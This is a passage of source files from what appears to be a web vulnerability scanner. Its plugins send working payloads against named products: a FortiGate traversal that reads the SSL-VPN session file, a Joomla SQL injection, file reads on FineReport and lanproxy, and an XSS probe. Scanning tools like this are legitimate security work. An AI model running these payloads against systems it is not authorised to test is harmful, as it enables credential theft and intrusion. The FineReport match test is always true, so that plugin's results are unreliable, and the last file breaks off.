"vulmsg": self.vulmsg, 45 | "request": parser_.getrequestraw(), 46 | "response": parser_.getresponseraw() 47 | } 48 | }) 49 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/f5/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/finecms/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/finereport/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/finereport/poc_finereport-directory-traversal_2019.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-05-11 3 | # @Author : caicai 4 | # @File : poc_finereport-directory-traversal_2019.py 5 | 6 | '''未验证''' 7 | 8 | # 此脚本为编写perfloder的poc模板,编写poc时复制一份此模版为pocname即可,用户可在verify方法下添加自己代码 9 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 10 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 11 | from myscan.config import scan_set 12 | 13 | 14 | class POC(): 15 | def __init__(self, workdata): 16 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 17 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 
18 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 19 | self.name = "finereport-directory-traversal" 20 | self.vulmsg = "referer:http://foreversong.cn/archives/1378" 21 | self.level = 3 # 0:Low 1:Medium 2:High 22 | 23 | def verify(self): 24 | # 根据config.py 配置的深度,限定一下目录深度 25 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 26 | return 27 | req = { 28 | "method": "GET", 29 | "url": self.url + "report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml", 30 | "headers": self.dictdata.get("request").get("headers"), 31 | "timeout": 10, 32 | "allow_redirects": False, 33 | "verify": False, 34 | } 35 | r = request(**req) 36 | if r != None and r.status_code == 200 and b"" in r.content and b"" in r.content: 37 | parser_ = response_parser(r) 38 | self.result.append({ 39 | "name": self.name, 40 | "url": self.url, 41 | "level": self.level, # 0:Low 1:Medium 2:High 42 | "detail": { 43 | "vulmsg": self.vulmsg, 44 | "request": parser_.getrequestraw(), 45 | "response": parser_.getresponseraw() 46 | } 47 | }) 48 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/fortigate/poc_fortigate_cve-2018-13379_2018.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/11/3 3 | # @Author : caicai 4 | # @File : poc_fortigate_cve-2018-13379_2018.py 5 | ''' 6 | fofa: 7 | "Fortinet" && title=="Please Login" 8 | ''' 9 | 10 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 11 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 12 | from myscan.config import scan_set 13 | 14 | 15 | class POC(): 16 | def __init__(self, workdata): 17 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 18 | self.url = workdata.get("data") # 
self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 19 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 20 | self.name = "fortigate_cve-2018-13379" 21 | self.vulmsg = "link :https://github.com/milo2012/CVE-2018-13379/blob/master/CVE-2018-13379.py" 22 | self.level = 3 # 0:Low 1:Medium 2:High 23 | 24 | def verify(self): 25 | if self.dictdata.get("url").get("protocol") != "https": 26 | return 27 | # 根据config.py 配置的深度,限定一下目录深度 28 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 29 | return 30 | 31 | req = { 32 | "method": "GET", 33 | "url": self.url + "remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession", 34 | "timeout": 10, 35 | "allow_redirects": False, 36 | "verify": False, 37 | } 38 | r = request(**req) 39 | if r != None and r.status_code == 200 and b"var fgt_lang =" in r.content: 40 | parser_ = response_parser(r) 41 | self.result.append({ 42 | "name": self.name, 43 | "url": self.url, 44 | "level": self.level, # 0:Low 1:Medium 2:High 45 | "detail": { 46 | "vulmsg": self.vulmsg, 47 | "request": parser_.getrequestraw(), 48 | "response": parser_.getresponseraw() 49 | } 50 | }) 51 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/hadoop/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/hadoop/poc_hadoop_unauth_acc_2018.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-05-03 3 | # @Author : caicai 4 | # @File : poc_hadoop_unauth_acc_2018.py 5 | 6 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 7 | from myscan.lib.helper.request import request # 
修改了requests.request请求的库,建议使用此库,会在redis计数 8 | from myscan.config import scan_set 9 | 10 | 11 | class POC(): 12 | def __init__(self, workdata): 13 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 14 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 15 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 16 | self.name = "hadoop unauth access" 17 | self.vulmsg = "referer:https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn" 18 | self.level = 2 # 0:Low 1:Medium 2:High 19 | 20 | def verify(self): 21 | # 根据config.py 配置的深度,限定一下目录深度 22 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 23 | return 24 | req = { 25 | "method": "GET", 26 | "url": self.url + "ws/v1/cluster/info", 27 | "headers": { 28 | "Content-Type": "application/json" 29 | }, 30 | "timeout": 10, 31 | "allow_redirects": True, 32 | "verify": False, 33 | } 34 | r = request(**req) 35 | 36 | if r != None and r.status_code == 200 and b"resourceManagerVersionBuiltOn" in r.content and b"hadoopVersion" in r.content: 37 | parser_ = response_parser(r) 38 | self.result.append({ 39 | "name": self.name, 40 | "url": req.get("url"), 41 | "level": self.level, # 0:Low 1:Medium 2:High 42 | "detail": { 43 | "vulmsg": self.vulmsg, 44 | "request": parser_.getrequestraw(), 45 | "response": parser_.getresponseraw() 46 | } 47 | }) 48 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/hikvision/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/hikvision/poc_hikvision_xss_2020.py: -------------------------------------------------------------------------------- 
1 | #!/usr/bin/env python3 2 | # @Time : 2020-06-23 3 | # @Author : caicai 4 | # @File : poc_hikvision_xss_2020.py 5 | 6 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 7 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 8 | from myscan.config import scan_set 9 | 10 | 11 | class POC(): 12 | def __init__(self, workdata): 13 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 14 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 15 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 16 | self.name = "hikvision_xss" 17 | self.vulmsg = "no detail " 18 | self.level = 1 # 0:Low 1:Medium 2:High 19 | 20 | def verify(self): 21 | # 根据config.py 配置的深度,限定一下目录深度 22 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 23 | return 24 | req = { 25 | "url": self.url + "home/licenseUpload.action?errorMsg=xxxxxx", 26 | "method": "GET", 27 | "verify": False, 28 | "timeout": 10, 29 | } 30 | r = request(**req) 31 | if r is not None and b"xxxxxx" in r.content and b'licenseFileName"' in r.content: 32 | parser_ = response_parser(r) 33 | self.result.append({ 34 | "name": self.name, 35 | "url": self.url, 36 | "level": self.level, # 0:Low 1:Medium 2:High 37 | "detail": { 38 | "vulmsg": self.vulmsg, 39 | "request": parser_.getrequestraw(), 40 | "response": parser_.getresponseraw() 41 | } 42 | }) 43 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/iis/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/info/__init__.py: 
-------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/19 3 | # @Author : caicai 4 | # @File : __init__.py.py 5 | 6 | 7 | # 此目录主要是一些提示工作 -------------------------------------------------------------------------------- /myscan/pocs/perfolder/info/poc_docker_registry_listing_2019.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/19 3 | # @Author : caicai 4 | # @File : poc_docker_registry_listing_2019.py 5 | 6 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 7 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 8 | from myscan.config import scan_set 9 | from myscan.lib.core.common import get_random_str 10 | 11 | ''' 12 | 未验证 13 | ''' 14 | class POC(): 15 | def __init__(self, workdata): 16 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 17 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 18 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 19 | self.name = "poc_docker_registry_listing_2019" 20 | self.vulmsg = "you can google it " 21 | self.level = 1 # 0:Low 1:Medium 2:High 22 | 23 | def verify(self): 24 | # 根据config.py 配置的深度,限定一下目录深度 25 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 26 | return 27 | req = { 28 | "method": "GET", 29 | "url": self.url + "v2/_catalog", 30 | "timeout": 10, 31 | "allow_redirects": False, 32 | "verify": False, 33 | } 34 | r = request(**req) 35 | if r != None and "application/json" in str(r.headers) and b'"repositories":' in r.content: 36 | parser_ = response_parser(r) 37 | self.result.append({ 38 | "name": self.name, 39 | "url": self.url, 40 | "level": self.level, # 0:Low 1:Medium 2:High 41 | "detail": { 42 | "vulmsg": self.vulmsg, 43 | "request": 
parser_.getrequestraw(), 44 | "response": parser_.getresponseraw() 45 | } 46 | }) 47 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/info/poc_front-page-misconfig.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/20 3 | # @Author : caicai 4 | # @File : poc_front-page-misconfig.py 5 | 6 | 7 | 8 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 9 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 10 | from myscan.config import scan_set 11 | 12 | 13 | class POC(): 14 | def __init__(self, workdata): 15 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 16 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 17 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 18 | self.name = "FrontPage configuration information discloure" 19 | self.vulmsg = "find sensitive msg" 20 | self.level = 1 # 0:Low 1:Medium 2:High 21 | 22 | def verify(self): 23 | # 根据config.py 配置的深度,限定一下目录深度 24 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 25 | return 26 | req = { 27 | "method": "GET", 28 | "url": self.url + "_vti_inf.html", 29 | "timeout": 10, 30 | "allow_redirects": False, 31 | "verify": False, 32 | } 33 | r = request(**req) 34 | if r is not None and len(r.content)==247: 35 | parser_ = response_parser(r) 36 | self.result.append({ 37 | "name": self.name, 38 | "url": self.url, 39 | "level": self.level, # 0:Low 1:Medium 2:High 40 | "detail": { 41 | "vulmsg": self.vulmsg, 42 | "request": parser_.getrequestraw(), 43 | "response": parser_.getresponseraw() 44 | } 45 | }) 46 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/info/poc_jira_service-desk-signup.py: 
-------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/20 3 | # @Author : caicai 4 | # @File : poc_jira_service-desk-signup.py 5 | 6 | 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "Jira Unauthenticated Projects" 18 | self.vulmsg = "find sensitive msg" 19 | self.level = 1 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | req = { 26 | "method": "POST", 27 | "url": self.url + "servicedesk/customer/user/signup", 28 | "headers": {"Content-Type": "application/json"}, 29 | "data": '{"email":"invalid","signUpContext":{},"secondaryEmail":"","usingNewUi":true}', 30 | "timeout": 10, 31 | "allow_redirects": False, 32 | "verify": False, 33 | } 34 | r = request(**req) 35 | if r is not None and r.status_code == 400 and b"signup.validation.errors" in r.content: 36 | parser_ = response_parser(r) 37 | self.result.append({ 38 | "name": self.name, 39 | "url": self.url, 40 | "level": self.level, # 0:Low 1:Medium 2:High 41 | "detail": { 42 | "vulmsg": self.vulmsg, 43 | "request": parser_.getrequestraw(), 44 | "response": parser_.getresponseraw() 45 | } 46 | }) 47 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/info/poc_jira_unauthenticated-projects.py: 
-------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/20 3 | # @Author : caicai 4 | # @File : poc_jira_unauthenticated-projects.py 5 | 6 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 7 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 8 | from myscan.config import scan_set 9 | 10 | 11 | class POC(): 12 | def __init__(self, workdata): 13 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 14 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 15 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 16 | self.name = "Jira Unauthenticated Projects" 17 | self.vulmsg = "find sensitive msg" 18 | self.level = 1 # 0:Low 1:Medium 2:High 19 | 20 | def verify(self): 21 | # 根据config.py 配置的深度,限定一下目录深度 22 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 23 | return 24 | req = { 25 | "method": "GET", 26 | "url": self.url + "rest/api/2/project?maxResults=100", 27 | "timeout": 10, 28 | "allow_redirects": False, 29 | "verify": False, 30 | } 31 | r = request(**req) 32 | words = [ 33 | "projects", 34 | "maxResults", 35 | "startAt", 36 | ] 37 | if r != None and all([x.encode() in r.content for x in words]): 38 | parser_ = response_parser(r) 39 | self.result.append({ 40 | "name": self.name, 41 | "url": self.url, 42 | "level": self.level, # 0:Low 1:Medium 2:High 43 | "detail": { 44 | "vulmsg": self.vulmsg, 45 | "request": parser_.getrequestraw(), 46 | "response": parser_.getresponseraw() 47 | } 48 | }) 49 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/jboss/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 
| # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/jira/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/jolokia/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/9/17 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/joomla/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/joomla/poc_joomla-cve-2017-8917-sqli_2017.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-05-11 3 | # @Author : caicai 4 | # @File : poc_joomla-cve-2017-8917-sqli_2017.py 5 | 6 | 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "joomla-cve-2017-8917-sqli" 18 | self.vulmsg = "referer : 
https://github.com/vulhub/vulhub/tree/master/joomla/CVE-2017-8917" 19 | self.level = 2 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | req = { 26 | "method": "GET", 27 | "url": self.url + "index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)", 28 | "headers": self.dictdata.get("request").get("headers"), 29 | "timeout": 10, 30 | "allow_redirects": False, 31 | "verify": False, 32 | } 33 | r = request(**req) 34 | if r != None and r.status_code == 500 and b"cf79ae6addba60ad018347359bd144d2" in r.content: 35 | parser_ = response_parser(r) 36 | self.result.append({ 37 | "name": self.name, 38 | "url": self.url, 39 | "level": self.level, # 0:Low 1:Medium 2:High 40 | "detail": { 41 | "vulmsg": self.vulmsg, 42 | "request": parser_.getrequestraw(), 43 | "response": parser_.getresponseraw() 44 | } 45 | }) 46 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/kibana/poc_kibana-unauth_2018.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-05-11 3 | # @Author : caicai 4 | # @File : poc_kibana-unauth_2018.py 5 | 6 | 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | 13 | class POC(): 14 | def __init__(self, workdata): 15 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 16 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 17 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 18 | self.name = "kibana-unauth" 19 | self.vulmsg = "未授权访问" 20 | 
self.level = 2 # 0:Low 1:Medium 2:High 21 | 22 | def verify(self): 23 | # 根据config.py 配置的深度,限定一下目录深度 24 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 25 | return 26 | req = { 27 | "method": "GET", 28 | "url": self.url+"app/kibana", 29 | "headers":self.dictdata.get("request").get("headers"), 30 | "timeout": 10, 31 | "allow_redirects": False, 32 | "verify": False, 33 | } 34 | r = request(**req) 35 | if r != None and r.status_code == 200 and b".kibanaWelcomeView" in r.content: 36 | parser_ = response_parser(r) 37 | self.result.append({ 38 | "name": self.name, 39 | "url": self.url, 40 | "level": self.level, # 0:Low 1:Medium 2:High 41 | "detail": { 42 | "vulmsg": self.vulmsg, 43 | "request": parser_.getrequestraw(), 44 | "response": parser_.getresponseraw() 45 | } 46 | }) 47 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/kong/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/kong/poc_kong-cve-2020-11710-unauth_2020.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-05-11 3 | # @Author : caicai 4 | # @File : poc_kong-cve-2020-11710-unauth_2020.py 5 | 6 | 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 
此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "kong-cve-2020-11710-unauth" 18 | self.vulmsg = "referer: https://xz.aliyun.com/t/7631" 19 | self.level = 2 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | req = { 26 | "method": "GET", 27 | "url": self.url, 28 | "timeout": 10, 29 | "allow_redirects": False, 30 | "verify": False, 31 | } 32 | r = request(**req) 33 | if r != None and r.status_code == 200 and b"kong_env" in r.content: 34 | req["url"] = self.url + "status" 35 | r1 = request(**req) 36 | if r1 != None and r1.status_code == 200 and b"kong_db_cache_miss" in r1.content: 37 | parser_ = response_parser(r1) 38 | self.result.append({ 39 | "name": self.name, 40 | "url": self.url, 41 | "level": self.level, # 0:Low 1:Medium 2:High 42 | "detail": { 43 | "vulmsg": self.vulmsg, 44 | "request": parser_.getrequestraw(), 45 | "response": parser_.getresponseraw() 46 | } 47 | }) 48 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/lanproxy/poc_lanproxy_fileread_2021.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2021/1/8 3 | # @Author : caicai 4 | # @File : poc_lanproxy_fileread_2021.py 5 | 6 | 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 
此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "lanproxy_fileread" 18 | self.vulmsg = "referer:https://forum.ywhack.com/viewthread.php?tid=114939" 19 | self.level = 3 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | req = { 26 | "method": "GET", 27 | "url": self.url + "../conf/config.properties", 28 | "timeout": 10, 29 | "allow_redirects": False, 30 | "verify": False, 31 | "quote": False # 新增的参数,path不需要编码,可wireshare抓包看到 32 | 33 | } 34 | r = request(**req) 35 | 36 | if r != None and r.status_code == 200 and "application/octet-stream" in r.headers.get("Content-Type", 37 | "") and b"server.bind" in r.content: 38 | parser_ = response_parser(r) 39 | self.result.append({ 40 | "name": self.name, 41 | "url": req.get("url"), 42 | "level": self.level, # 0:Low 1:Medium 2:High 43 | "detail": { 44 | "vulmsg": self.vulmsg, 45 | "request": parser_.getrequestraw(), 46 | "response": parser_.getresponseraw() 47 | } 48 | }) 49 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/laravel/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/laravel/poc_laravel-debug-info-leak_2020.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/7/23 3 | # @Author : caicai 4 | # @File : poc_laravel-debug-info-leak_2020.py 5 | 6 | 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 
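from myscan.lib.core.common import get_random_str  # NOTE(review): not used anywhere in this file


class POC():
    """Laravel debug-mode information leak.

    A bodyless POST to a directory of a Laravel app that runs with debugging
    enabled answers 405 with the framework's verbose error page, which includes
    an "Environment & details" section (config, env vars, request data).
    """

    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # python dict of the captured request/response; see the dict example in docs/开发指南 (dev guide)
        self.url = workdata.get("data")  # directory URL under test; always ends with "/", e.g. https://www.baidu.com/home/
        self.result = []  # findings: dicts with name, url, level and detail keys; detail must itself be a dict (see the self.result.append below)
        self.name = "laravel-debug-info-leak"
        self.vulmsg = "referer:https://github.com/nic329/webapp-misconfig-docker/tree/master/laravel/5_debug"
        self.level = 1  # 0:Low 1:Medium 2:High

    def verify(self):
        """POST to the directory and report when the 405 reply carries the debug page."""
        # skip directories deeper than the max_dir depth configured in config.py
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return
        req = {
            "method": "POST",
            "url": self.url,
            "timeout": 10,
            "allow_redirects": False,
            "verify": False,  # scan targets commonly use self-signed certs; TLS validity is not the signal here
        }
        r = request(**req)

        # A 405 with MethodNotAllowedHttpException alone is normal Laravel behaviour;
        # the "Environment & details" section only exists on the debug error page.
        if r is not None and r.status_code == 405 and b"MethodNotAllowedHttpException" in r.content and b"Environment & details" in r.content:
            parser_ = response_parser(r)
            self.result.append({
                "name": self.name,
                "url": req.get("url"),
                "level": self.level,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "request": parser_.getrequestraw(),
                    "response": parser_.getresponseraw()
                }
            })

--------------------------------------------------------------------------------
/myscan/pocs/perfolder/nexus/__init__.py:
--------------------------------------------------------------------------------
# !/usr/bin/env python3
# @Time : 2020/8/21
# @Author : caicai
# @File : __init__.py.py
--------------------------------------------------------------------------------
/myscan/pocs/perfolder/nginx/poc_nginx-module-vts-xss.py:
--------------------------------------------------------------------------------
# !/usr/bin/env python3
# @Time : 2020/8/21
# @Author : caicai
# @File : poc_nginx-module-vts-xss.py

'''
Reproduce:
docker pull gaciaga/nginx-vts:1.11.10-alpine-vts-0.1.12
docker run -P -itd gaciaga/nginx-vts:1.11.10-alpine-vts-0.1.12

'''
from myscan.config import scan_set
from myscan.lib.helper.request import request
from myscan.lib.parse.response_parser import response_parser


class POC():
    """Reflected XSS in the nginx virtual-host traffic status (vts) module.

    The probe appends a <script> tag to the status path and reports only when
    the status page echoes it back unescaped.
    """

    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # python dict of the captured request/response; see the dict example in docs/开发指南 (dev guide)
        self.url = workdata.get("data")  # directory URL under test; always ends with "/", e.g. https://www.baidu.com/home/
        self.result = []  # findings: dicts with name, url, level and detail keys; detail must itself be a dict (see the self.result.append below)
        self.name = "nginx-module-vts-xss"
        self.vulmsg = '''Nginx virtual host traffic status module XSS'''
        self.level = 2  # 0:Low 1:Medium 2:High

    def verify(self):
        """Request status><script>xxxxxx(31337)</script> and look for the unescaped reflection."""
        # skip directories deeper than the max_dir depth configured in config.py
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return

        req = {
            "method": "GET",
            "url": self.url + "status%3E%3Cscript%3Exxxxxx(31337)%3C%2Fscript%3E",
            "headers": self.dictdata.get("request").get("headers"),  # reuse the captured headers, mainly to keep cookies
            "timeout": 10,
            "allow_redirects": False,  # judge reflection on the direct reply, not on a redirect target
            "verify": False,
        }

        r = request(**req)
        # Both conditions are required: the page must be the vts monitor AND it must
        # reflect the probe verbatim.  The previous check tested `b'' in r.content`,
        # which is always true, so every vts instance was reported as XSS.
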